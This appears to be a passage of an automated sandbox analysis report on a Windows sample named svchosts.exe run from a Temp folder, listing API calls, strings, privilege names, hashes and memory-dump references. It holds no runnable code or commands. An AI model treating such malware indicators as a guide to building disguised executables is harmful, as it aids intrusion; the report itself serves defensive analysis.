                                                                      • Instruction ID: 905bd01130a8dd811e6c9645a50942e0aebc7d6f76376ff8daf50bc2429bbb3a
                                                                      • Opcode Fuzzy Hash: 215746e5005ecc5adf43f304df831aa550706a6bd8d4afecdbaabb374ded3085
                                                                      • Instruction Fuzzy Hash: 05F01D72D0212AEB9B209FE2EC4CDFB7F6CEE162A1740442AF505D2110EF24D509CBB1
                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\svchosts.exe,00000104), ref: 002B76FD
                                                                      • _free.LIBCMT ref: 002B77C8
                                                                      • _free.LIBCMT ref: 002B77D2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: _free$FileModuleName
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\svchosts.exe
                                                                      • API String ID: 2506810119-1829578515
                                                                      • Opcode ID: 272c827a071b9cee7ab46f07a65395e414b177ab45ee732b1ed5157c249f67ea
                                                                      • Instruction ID: e5fad826d31f3c1648e55408ee20bc5d9d947d18128c167fc2c03dc6122e6feb
                                                                      • Opcode Fuzzy Hash: 272c827a071b9cee7ab46f07a65395e414b177ab45ee732b1ed5157c249f67ea
                                                                      • Instruction Fuzzy Hash: 5E318271A24219EFDB21DF9ADC859EEBBFCEBC4390F144066F50997211DA708E60DB90
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00297579
                                                                        • Part of subcall function 00293B3D: __EH_prolog.LIBCMT ref: 00293B42
                                                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00297640
                                                                        • Part of subcall function 00297BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00297C04
                                                                        • Part of subcall function 00297BF5: GetLastError.KERNEL32 ref: 00297C4A
                                                                        • Part of subcall function 00297BF5: CloseHandle.KERNEL32(?), ref: 00297C59
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                      • API String ID: 3813983858-639343689
                                                                      • Opcode ID: 680a256a1f3259d4a1b9015c848cddf5c809341054aad3947f0120d5d4031daf
                                                                      • Instruction ID: d2237f063d153d3ab4478b3b124e0da1869f9dc6945be425163c80326d0584e4
                                                                      • Opcode Fuzzy Hash: 680a256a1f3259d4a1b9015c848cddf5c809341054aad3947f0120d5d4031daf
                                                                      • Instruction Fuzzy Hash: AC31A171924249AFDF20EF68EC45BEEBBB9AF15354F004069F844A7152DB704964CB61
                                                                      APIs
                                                                        • Part of subcall function 0029130B: GetDlgItem.USER32(00000000,00003021), ref: 0029134F
                                                                        • Part of subcall function 0029130B: SetWindowTextW.USER32(00000000,002C35B4), ref: 00291365
                                                                      • EndDialog.USER32(?,00000001), ref: 002AA4B8
                                                                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 002AA4CD
                                                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 002AA4E2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ItemText$DialogWindow
                                                                      • String ID: ASKNEXTVOL
                                                                      • API String ID: 445417207-3402441367
                                                                      • Opcode ID: 29d830e2a5090d70dc9b65fd6ebfa08a8d68ca456ad2e0723e07f84991091df5
                                                                      • Instruction ID: c8c3a5b2844433101bbe2a831f51ea8f322568f45a9128b32b1f352b03c3ac9e
                                                                      • Opcode Fuzzy Hash: 29d830e2a5090d70dc9b65fd6ebfa08a8d68ca456ad2e0723e07f84991091df5
                                                                      • Instruction Fuzzy Hash: 0B11B632264301AFDA219F68ED4DF763769EF4F750F100125F341971A1CBE19925DB26
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: __fprintf_l_strncpy
                                                                      • String ID: $%s$@%s
                                                                      • API String ID: 1857242416-834177443
                                                                      • Opcode ID: 4f899b5511adcdfd38eac8f5337db6d39b52f5d30605047d56ffbd03749a45fb
                                                                      • Instruction ID: bd3190780b55e16a969788a8848874adaee7229ae9daef1735f6521ba328ca96
                                                                      • Opcode Fuzzy Hash: 4f899b5511adcdfd38eac8f5337db6d39b52f5d30605047d56ffbd03749a45fb
                                                                      • Instruction Fuzzy Hash: 62219072860209ABDF20DFA4CC06FEE7BA8AF05300F044526FE1496192E371EA75EF51
                                                                      APIs
                                                                      • _swprintf.LIBCMT ref: 0029B51E
                                                                        • Part of subcall function 0029400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0029401D
                                                                      • _wcschr.LIBVCRUNTIME ref: 0029B53C
                                                                      • _wcschr.LIBVCRUNTIME ref: 0029B54C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                      • String ID: %c:\
                                                                      • API String ID: 525462905-3142399695
                                                                      • Opcode ID: df0c6d76dc653d6e80351b41c8b7d3b6665cc39241ef628d26ee036ec15e2cda
                                                                      • Instruction ID: 81dedb0bc06f9e304abce0f3467793491bbf5f157da3f527e9b605eaca52b88a
                                                                      • Opcode Fuzzy Hash: df0c6d76dc653d6e80351b41c8b7d3b6665cc39241ef628d26ee036ec15e2cda
                                                                      • Instruction Fuzzy Hash: 96014E53920312B6CF31AF74AC82DABB7ACDE953A07D18506F844C6441FB20D470C7A1
                                                                      APIs
                                                                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0029ABC5,00000008,?,00000000,?,0029CB88,?,00000000), ref: 002A06F3
                                                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0029ABC5,00000008,?,00000000,?,0029CB88,?,00000000), ref: 002A06FD
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0029ABC5,00000008,?,00000000,?,0029CB88,?,00000000), ref: 002A070D
                                                                      Strings
                                                                      • Thread pool initialization failed., xrefs: 002A0725
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                      • String ID: Thread pool initialization failed.
                                                                      • API String ID: 3340455307-2182114853
                                                                      • Opcode ID: ba45d2249eee8a93333dface1530e4d2616150b418870c756759228d0b36742b
                                                                      • Instruction ID: 5e9024181a96212d6b877b246c477bab188c57b3dc8870531f7594d850cd7482
                                                                      • Opcode Fuzzy Hash: ba45d2249eee8a93333dface1530e4d2616150b418870c756759228d0b36742b
                                                                      • Instruction Fuzzy Hash: 3B1170B1510709AFC3315F66DCC8AABFBECEB99754F10482EF1DA82200DA716990CB50
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                      • API String ID: 0-56093855
                                                                      • Opcode ID: a11731944dfbae181065ee5fc19ecf2b4b817c73545f055baf935f0cbd454be7
                                                                      • Instruction ID: e1bc1660ddccf28686afb2237618a90fc7064a19a7f63c6cd2a0c43325c11949
                                                                      • Opcode Fuzzy Hash: a11731944dfbae181065ee5fc19ecf2b4b817c73545f055baf935f0cbd454be7
                                                                      • Instruction Fuzzy Hash: D801B171A2124AAFDB119F18FD48F963BA9E71A390B000466F506D2630DEB19C60EFA1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: __alldvrm$_strrchr
                                                                      • String ID:
                                                                      • API String ID: 1036877536-0
                                                                      • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                                                      • Instruction ID: 1f52378ed0d41a4bdbbdceab22781438914b6edc60a29926c92936968117caa5
                                                                      • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                                                      • Instruction Fuzzy Hash: BBA17B319207869FDB11CF68C8917EEBBF5EF56390F1441ADEA859B381C6389C92CB50
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,002980B7,?,?,?), ref: 0029A351
                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,002980B7,?,?), ref: 0029A395
                                                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,002980B7,?,?,?,?,?,?,?,?), ref: 0029A416
                                                                      • CloseHandle.KERNEL32(?,?,00000000,?,002980B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0029A41D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: File$Create$CloseHandleTime
                                                                      • String ID:
                                                                      • API String ID: 2287278272-0
                                                                      • Opcode ID: f74e1f2117c0ae48c3af45eeeace2a2e13c0bc6bf9da345d10bc891ac4f2dd77
                                                                      • Instruction ID: 740fd281b6e002ad1cfe2dd5492eb064f4c2ca6cf75d68fe73b273d0050ec8ce
                                                                      • Opcode Fuzzy Hash: f74e1f2117c0ae48c3af45eeeace2a2e13c0bc6bf9da345d10bc891ac4f2dd77
                                                                      • Instruction Fuzzy Hash: A241EE31268382ABEB31DF24DC45FEEBBE8AF81700F04095DB5D0D3181DA649A58DB93
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,002B89AD,?,00000000,?,00000001,?,?,00000001,002B89AD,?), ref: 002BC0E6
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002BC16F
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,002B67E2,?), ref: 002BC181
                                                                      • __freea.LIBCMT ref: 002BC18A
                                                                        • Part of subcall function 002B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002BC13D,00000000,?,002B67E2,?,00000008,?,002B89AD,?,?,?), ref: 002B854A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                      • String ID:
                                                                      • API String ID: 2652629310-0
                                                                      • Opcode ID: 8fcb9e73055e7a7ef71295eb032044dbd82830b07ad313a9c54459996318aade
                                                                      • Instruction ID: 654b07107e4f4e93800ee7b22577128a8548ebcedbc9ae570d4c06b29c10b935
                                                                      • Opcode Fuzzy Hash: 8fcb9e73055e7a7ef71295eb032044dbd82830b07ad313a9c54459996318aade
                                                                      • Instruction Fuzzy Hash: 6831F272A2010AABDF24DF69DC45DEE7BA9EB40350F254128FC18E7151EB35DD60CBA0
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 002A9DBE
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 002A9DCD
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002A9DDB
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 002A9DE9
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      • Opcode ID: 5cf4c4c61df8bc066118bb8509a2d81cd326b5ce53f25ade2585407fed1ecd8c
                                                                      • Instruction ID: f7d6fdb0f9ee6d2ded93092e6cef155f170eeaaf8a2690376027b20b4d137f0e
                                                                      • Opcode Fuzzy Hash: 5cf4c4c61df8bc066118bb8509a2d81cd326b5ce53f25ade2585407fed1ecd8c
                                                                      • Instruction Fuzzy Hash: A4E0EC32986A22E7D3605BA5BC0DBAB3B58EB1A7A2F054029F60596290DE704849CF95
                                                                      APIs
                                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 002B2016
                                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 002B201B
                                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 002B2020
                                                                        • Part of subcall function 002B310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 002B311F
                                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 002B2035
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                      • String ID:
                                                                      • API String ID: 1761009282-0
                                                                      • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                                                      • Instruction ID: 27c00f090c02dca9b12f1bfdc9617fba60da03d8c3eec96166bb97165d2d4470
                                                                      • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                                                      • Instruction Fuzzy Hash: D1C04C24034745D41C11BEBA32022FD17580C727D4BD269C2E8C417103DE46067E9E72
                                                                      APIs
                                                                        • Part of subcall function 002A9DF1: GetDC.USER32(00000000), ref: 002A9DF5
                                                                        • Part of subcall function 002A9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 002A9E00
                                                                        • Part of subcall function 002A9DF1: ReleaseDC.USER32(00000000,00000000), ref: 002A9E0B
                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 002A9F8D
                                                                        • Part of subcall function 002AA1E5: GetDC.USER32(00000000), ref: 002AA1EE
                                                                        • Part of subcall function 002AA1E5: GetObjectW.GDI32(?,00000018,?), ref: 002AA21D
                                                                        • Part of subcall function 002AA1E5: ReleaseDC.USER32(00000000,?), ref: 002AA2B5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectRelease$CapsDevice
                                                                      • String ID: (
                                                                      • API String ID: 1061551593-3887548279
                                                                      • Opcode ID: 926bb89ec401e289c0f25e4b53ea6b6c3c90c4f93f782c532271b0edd61aa78d
                                                                      • Instruction ID: b1a47023aa84470cead69bfdeab9bf356253ed44ef5aa6c4e02121abcb17d10c
                                                                      • Opcode Fuzzy Hash: 926bb89ec401e289c0f25e4b53ea6b6c3c90c4f93f782c532271b0edd61aa78d
                                                                      • Instruction Fuzzy Hash: B68122B1218314AFC614DF68D848E2ABBF9FF89700F00891DF98AD7260DB31AD05CB52
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf
                                                                      • String ID: %ls$%s: %s
                                                                      • API String ID: 589789837-2259941744
                                                                      • Opcode ID: 81a0fa6412cf03ab7bd3e15104e2260b979c54c6d375452227699f706b7a45bf
                                                                      • Instruction ID: a983d619bd3d188f56e5b693206f0ac584f6e7f5c09b6edb3d7b82bef2994644
                                                                      • Opcode Fuzzy Hash: 81a0fa6412cf03ab7bd3e15104e2260b979c54c6d375452227699f706b7a45bf
                                                                      • Instruction Fuzzy Hash: 5651C8315BC740FFEA311AA4CE92F367655AB17B01F204906BBDA748D5CED25470BA12
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00297730
                                                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002978CC
                                                                        • Part of subcall function 0029A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0029A27A,?,?,?,0029A113,?,00000001,00000000,?,?), ref: 0029A458
                                                                        • Part of subcall function 0029A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0029A27A,?,?,?,0029A113,?,00000001,00000000,?,?), ref: 0029A489
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: File$Attributes$H_prologTime
                                                                      • String ID: :
                                                                      • API String ID: 1861295151-336475711
                                                                      • Opcode ID: 687fe186056b6f4f9bd354ff68936bea3e3b831d4acc2ee52a824b7072e16c14
                                                                      • Instruction ID: 105c8994c090585eecbd8acc4f264c9415372c9c9aaae3a1ea1da38d2ec45acf
                                                                      • Opcode Fuzzy Hash: 687fe186056b6f4f9bd354ff68936bea3e3b831d4acc2ee52a824b7072e16c14
